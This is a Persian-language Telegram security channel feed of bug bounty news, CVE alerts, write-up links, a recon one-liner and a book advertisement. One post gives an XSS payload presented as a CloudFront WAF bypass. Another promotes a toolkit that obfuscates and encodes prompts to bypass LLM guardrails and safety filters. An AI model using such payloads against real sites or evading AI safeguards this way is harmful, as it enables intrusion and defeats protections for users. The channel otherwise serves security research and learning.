This media is not supported in your browser
VIEW IN TELEGRAM
کشف زنجیره آسیبپذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس!
گزارشهای جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر میدهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد میکند. این اکسپلویت از یک آسیبپذیری روز صفر (0-day) استفاده میکند.
🔹 جزئیات کلیدی:
شناسه آسیبپذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخههای قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستمعامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاههای اندرویدی خود استفاده میکنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینکهای مشکوک خودداری نمایید.
گزارشهای جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر میدهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد میکند. این اکسپلویت از یک آسیبپذیری روز صفر (0-day) استفاده میکند.
🔹 جزئیات کلیدی:
شناسه آسیبپذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخههای قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستمعامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاههای اندرویدی خود استفاده میکنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینکهای مشکوک خودداری نمایید.
🔥11❤2👍1
Reading Anyone's Private Meta AI Conversations — Without Authentication
https://j4eva.io/blog/meta-ai-idor
https://j4eva.io/blog/meta-ai-idor
j4eva.io
Reading Anyone's Private Meta AI Conversations — luke farchione
Bug bounty writeup: IDOR vulnerability in Meta AI allowing anonymous read access to private conversations. $5,000 bounty.
❤4🔥1
Client-Side Path Traversal (CSPT) — How Deleting a Spam Post Deleted the Org Owner's Own Content Instead
https://blog.captinsharky.com/post.php?slug=cspt-forced-post-deletion
https://blog.captinsharky.com/post.php?slug=cspt-forced-post-deletion
Captinsharky
Client-Side Path Traversal (CSPT) — How Deleting a Spam Post Deleted the Org Owner's Own Content Instead 🕵️♂️🔓 // captn0sharky
A pure client-side path traversal bug — no broken authorization needed. The attacker hides the real target inside their own post, and the victim's normal "delete this spam" click does the rest.
🔥4❤1
XSS: Bypass CloudFront WAF
<object/data="javascript:alert/**/(document.domain)">//</object>🔥9❤2
World Of Security
Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//'…
البته این یک مثال ساده از بروت لاجیک بود. اما کلا ایده اینه که شما بیایی هرچقدر که میتونی همه چیز رو برای خودتون بهینه کنید.
بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.
بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.
❤6
Local AI for Penetration Testing & Research
جالب بود
https://projectblack.io/blog/local-ai-for-cyber-security/
جالب بود
https://projectblack.io/blog/local-ai-for-cyber-security/
Research Blog | Project Black
Local AI for Penetration Testing & Research
How competent are local AI models for cyber security bug hunting and research?
🔥8❤1
How to Use AI for Bug Bounty in 2026
https://www.penligent.ai/hackinglabs/how-to-use-ai-for-bug-bounty-in-2026/
https://www.penligent.ai/hackinglabs/how-to-use-ai-for-bug-bounty-in-2026/
Penligent Security Blog – AI-Driven Hacking Tutorials, Exploit PoCs & Cybersecurity Research
How to Use AI for Bug Bounty in 2026
A practical, evidence-driven guide to using AI for bug bounty in 2026, from recon triage and API auth testing to AI-native targets, reporting discipline, and safe research boundaries.
🔥6👏1
ابزار تخصصی Bypass Guardrail LLM
یکی از دردسرهای اصلی تست امنیت مدلهای زبانی، ساخت دستی و تکراری payloadهای obfuscated هست.
این toolkit قدرتمند به صورت اتوماتیک پرامپتهای ورودی رو با مجموعه گستردهای از تکنیکهای obfuscation، encoding، transformation و evasion پردازش میکنه تا بتونی guardrailهای مختلف (safety filters، alignment mechanisms، output restrictions) رو تست و bypass کنی.
https://x.com/intigriti/status/2072245581309792479?t=80c3yWyYo7494DcuQIPb3Q&s=19
https://elder-plinius.github.io/P4RS3LT0NGV3/
یکی از دردسرهای اصلی تست امنیت مدلهای زبانی، ساخت دستی و تکراری payloadهای obfuscated هست.
این toolkit قدرتمند به صورت اتوماتیک پرامپتهای ورودی رو با مجموعه گستردهای از تکنیکهای obfuscation، encoding، transformation و evasion پردازش میکنه تا بتونی guardrailهای مختلف (safety filters، alignment mechanisms، output restrictions) رو تست و bypass کنی.
https://x.com/intigriti/status/2072245581309792479?t=80c3yWyYo7494DcuQIPb3Q&s=19
https://elder-plinius.github.io/P4RS3LT0NGV3/
🔥6❤1
The Bug Bounty Singularity: Our Hackbot
https://josephthacker.com/hacking/2026/07/01/we-built-a-hackbot.html
https://josephthacker.com/hacking/2026/07/01/we-built-a-hackbot.html
🔥3❤1👏1
World Of Security
dom xss cheat sheet @world_of_security
اگر محتوا های این مدلی رو در کنار دیگر لینک های که میخونیم دوست دارید
ری اکشن بزارید
موضوع این چیت شیت ها اینه که چیز هایی که میخونیم و تحقیق میکنیم رو میدیم به ai خلاصشو براتون شیر میکنیم
پس با ری اکشناتون روی پست بالا مارو حمایت کنید
ری اکشن بزارید
موضوع این چیت شیت ها اینه که چیز هایی که میخونیم و تحقیق میکنیم رو میدیم به ai خلاصشو براتون شیر میکنیم
پس با ری اکشناتون روی پست بالا مارو حمایت کنید
❤13👍3
🐘 PHP PDO layer exposed! Aleksey Solovev & Nikita Sveshnikov uncovered 2 flaws: SQL Injection in pdo_firebird (CVE-2025-14179) and DoS in PDO via pdo_pgsql (CVE-2025-14180).
https://swarm.ptsecurity.com/hack-the-elephant-one-bite-at-a-time-nul-byte-sql-injection-in-pdo_firebird-and-null-pointer-dereference-in-pdo-pgsql/
https://swarm.ptsecurity.com/hack-the-elephant-one-bite-at-a-time-nul-byte-sql-injection-in-pdo_firebird-and-null-pointer-dereference-in-pdo-pgsql/
❤4🔥1
این مخزن میاد تمامی برنامه هارو از پلتفرم های باگ بانتی جمع آوری میکنه و اونارو در اختیارتون قرار میده
چیز عجیبی نیست و قدیمی هم هست اما خب هنوز هم میتونه کار آمد باشه.
https://github.com/arkadiyt/bounty-targets-data
چیز عجیبی نیست و قدیمی هم هست اما خب هنوز هم میتونه کار آمد باشه.
https://github.com/arkadiyt/bounty-targets-data
GitHub
GitHub - arkadiyt/bounty-targets-data: This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hacker…
This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports - arkadiyt/bounty-targets-data
🔥7❤2
RedWing: A Mobile Malware-as-a-Service Operation
https://zimperium.com/blog/redwing-a-mobile-malware-as-a-service-operation
https://zimperium.com/blog/redwing-a-mobile-malware-as-a-service-operation
Zimperium
RedWing: A Mobile Malware-as-a-Service Operation
true
🔥5
نمیفهمم بخدا. تا میاییم یزره به زندگیمون برسیم چنتا چیز یادبگیریم ی کوچولو کار کنیم جنگ میشه :) این زندگی نیست بخدا
👍37❤2
Forwarded from SecCode (Meisam Monsef)
پیش فروش کتاب جامع تست نفوذ وب ( جلد اول ) شروع شد .
تالیف : میثم منصف
قیمت نهایی کتاب :18,000,000 ریال با تخفیف 15 درصد 15,300,000 ریال
دقت داشته باشید در حال دریافت مجوز کتاب هستیم و فعلا پیش فروش فقط از طریق وب سایت انجام میشود.
تا تاریخ 1405/05/05 فرصت دارید پیش ثبت نام و هزینه آن را پرداخت کنید چون تعداد محدودی چاپ میشود .
این کتاب فقط به صورت حضوری در تهران قابل تهیه و دریافت است و متأسفانه امکان ارسال برای شهرستانها یا حتی داخل تهران نداریم.
آدرس محل دریافت کتاب را به زودی اعلام میکنیم.
برای خرید کتاب به آدرس زیر مراجعه کنید :
https://mrowasp.ir/buy-book
@SecCode
تالیف : میثم منصف
قیمت نهایی کتاب :
دقت داشته باشید در حال دریافت مجوز کتاب هستیم و فعلا پیش فروش فقط از طریق وب سایت انجام میشود.
تا تاریخ 1405/05/05 فرصت دارید پیش ثبت نام و هزینه آن را پرداخت کنید چون تعداد محدودی چاپ میشود .
این کتاب فقط به صورت حضوری در تهران قابل تهیه و دریافت است و متأسفانه امکان ارسال برای شهرستانها یا حتی داخل تهران نداریم.
آدرس محل دریافت کتاب را به زودی اعلام میکنیم.
برای خرید کتاب به آدرس زیر مراجعه کنید :
https://mrowasp.ir/buy-book
@SecCode
❤3🔥2